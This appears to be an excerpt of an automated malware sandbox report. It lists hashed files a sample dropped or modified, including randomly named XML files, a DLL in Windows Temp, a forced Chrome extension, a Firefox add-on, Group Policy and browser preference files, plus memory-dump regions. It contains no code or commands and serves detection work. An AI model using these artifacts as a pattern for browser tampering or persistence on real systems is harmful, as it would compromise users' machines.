C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9a50da1118562d91c4a1cb74217419fd
SHA1 9929f35d349acb4ad44e9601cff39193c66e08e7
SHA256 cd60c814cf283ae73c1effe3a420b68a944a4a3e5f914d99295bfa88a7bf9c2b
SHA512 94868df4197c09f3f52ff8a1c87811d7ecf953fca178d87351f22437fb66da857dc37b49e5b8c02d8f4d0f1c263a41e8ae12c4323853612f6193c6e3c0b75ec2

memory/4848-218-0x0000000007070000-0x00000000070BB000-memory.dmp

C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

MD5 a526b9e7c716b3489d8cc062fbce4005
SHA1 2df502a944ff721241be20a9e449d2acd07e0312
SHA256 e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512 d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

MD5 f017a1830bf3adcf5ae466cc31ae2c3b
SHA1 5039fa999981713502ea842be1f42f4283745c2b
SHA256 c3782e457790b6a11a3b279f83d1a1cc2d7b0ed1970828c7534302956fe8ce5f
SHA512 08a0c1d8252b55a0cc497ea4d1a57bff48994b51f4da0a733edf8fc0bfa1ba8e649fdceeceadb90be067346f25197f53ca3b259f18d57a419b6384419192bdce

memory/4148-259-0x0000000002F60000-0x0000000002FC7000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 59e32caa6d74ce1d8a0ffd0209ce1e65
SHA1 1b4865c4c51e46a2c1f2f76cf26534d3420a093a
SHA256 51bfb679c1b6a09a748c1a1ae9f29ade439d69de04deb75b7040f3ffa930a4c8
SHA512 9a7a45675834af5b240ccb05e9798ca2c9ae19ec9d77ae4ad9d46dc0f2fad7bb458609fb3c25e0c028ac3c815e306abaa78bec2c8ce38737557eaab07e002cf2

C:\Program Files (x86)\JbudRisgU\nBtEyWy.xml

MD5 a71b8d29dfab14ca7a051bbd0acd49c2
SHA1 12da193f0db82b1d1a1bb84848725897c1143024
SHA256 ad00213427ee048ad08326891d9d734f6a0c9a8f2a24b6c310d69d14b5607495
SHA512 cfd689474fffcc04731d7f1cfb754cd1c942011262e28691945b708dc425b033d0077a1625f506f112f93409e31dda6c6f28e316d889c1e68072b37cad42451c

C:\Program Files (x86)\zpocSIDFTSWU2\WrVVPHN.xml

MD5 6a5daddde7e1279cd9e5a688e25afb38
SHA1 152d2eda1f99b46e3b84e08a422bc440835559ce
SHA256 c3a85ce531bcb00e954c7295add492fd7f070dddadab84d72eb536fadcd995e0
SHA512 c4d414195b9f2943bf5ee4534fa0aa113dfb33f78f468f43648df3cd0f0a63f3c2b686894688e250b9586df7662884cbe8a820a2914937b46560919dce2c2976

C:\ProgramData\SRtRtaafQKnfEXVB\uBRmjsc.xml

MD5 08c262d3a0311500be7d3b64e5616a68
SHA1 b79221a0985bd258f9742b56d8eac6e995aa9dd4
SHA256 039d01d560586be8095ad94e852463b6c86612a9c7e861cad283643186b2b616
SHA512 3120b43b94681110ff06f63eb063311aff47b446935e83914031575650d32657c24347760c6947f3bb8644845079869cd95d51cb659e28dfac0c93b91ca20cd3

C:\Program Files (x86)\KDIdGNeaPBYNADfhwFR\qrVDylp.xml

MD5 356ff1e401118077edb103d2843dcd21
SHA1 04b3555de74aa2ba4db0605a2b734be67ecd5eb0
SHA256 1b035dee4666e8ba6dd7b0b711a27401ba0f32b70c336ae3e158b696c98fca3c
SHA512 41642d4b423656b8bebcae0eda49077e42d62e5a946686f51f8d0a7619c226ca895341a529f49c653aa8f0234adcad060200eac0c0a6fd15884e65984d98104a

C:\Program Files (x86)\VloXEwfyUAdsC\heGCxyl.xml

MD5 f59b141bf30b38493479da17b5d7e721
SHA1 7dc15c2f0b24040f8027504431b1f703225dc35a
SHA256 e27458d852bb999c061a122ef6fba0f47aa93458b167e47a5c19ef8a30b25e15
SHA512 56a21afa4d05a502dca0b428ee6e2ff6129193952573f83cfed84f84ea9a3ffbd5992b95a28a3b1003d2e56f70091bdd6272b539c5089a4a023becfc30b8b18c

C:\Windows\Temp\LHhfOSCKsioeHeSb\IEcADHVR\jNqRQVr.dll

MD5 0320220ef885e75e5aaf88ea3f05344a
SHA1 a49a7bebfa775ca15e4476d7e428d7e0ce6c1224
SHA256 3a08912e795f1a6ff69ab34760a60cb54b248fc199fed6762a037003d8548360
SHA512 731143275c2f443bc3679321885203ccb4cd2f0d47933c2dfac8079fc64c63310ef2437fea8fa9eeffe5c13702d8d01b160537e5a9c58142a7ac2ba9fc786027

memory/4148-442-0x0000000003740000-0x00000000037C8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\prefs.js

MD5 fb979877335fa3d0c35470a8ab6c4508
SHA1 61ca09e5d7d36628c6a5a50817032b508edc9cd0
SHA256 a646b3e604c4eac93488b7a1f95b36451bc1573276d7ca2765b4985042ebdd27
SHA512 5b6ba04af1810c7c1e18daa81f43ee166ed2953342de60952357fc1d52971cb471727e98df198ff72e0d909e224742d1d2f5dc626bce4c93f37e5df1dfeec140

memory/4148-453-0x00000000037D0000-0x00000000038B9000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 5b49cff36407c633fa36d06ca3aaeddd
SHA1 0e3a62eadb497f43a228f400d99cd1cd72bb03f4
SHA256 9ccf07cfbcb32b5354852a8ce21f430009e01f82768fd012c90d3cc8cfa9ef87
SHA512 c64a60bcdd9d0647c848f946dada97de4c83da3b0a07065d7f4657b10e87a09e0f2f137612b27b1d0c66269ea777d461984a0d6704e4f283edbdc13a70800fee

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 d93fa7dbafc1acb5e5b17246aa20f8ee
SHA1 6ec46f13c78dca35624dc9117b87eb524b88aa50
SHA256 b1fa4f8b7520ac473e86634bf15be960699515bb7aac37bbafe35f02ece49643
SHA512 7345013e2b5f9da5891858ca76752103bdb75976c7bf9dd5b2a5c9902551f9ae7b2a6eed4239086b782f342bbaeabd81b5e9ab04308dd8507b94d1643cfe45e8

memory/856-472-0x00000000036A0000-0x00000000054FD000-memory.dmp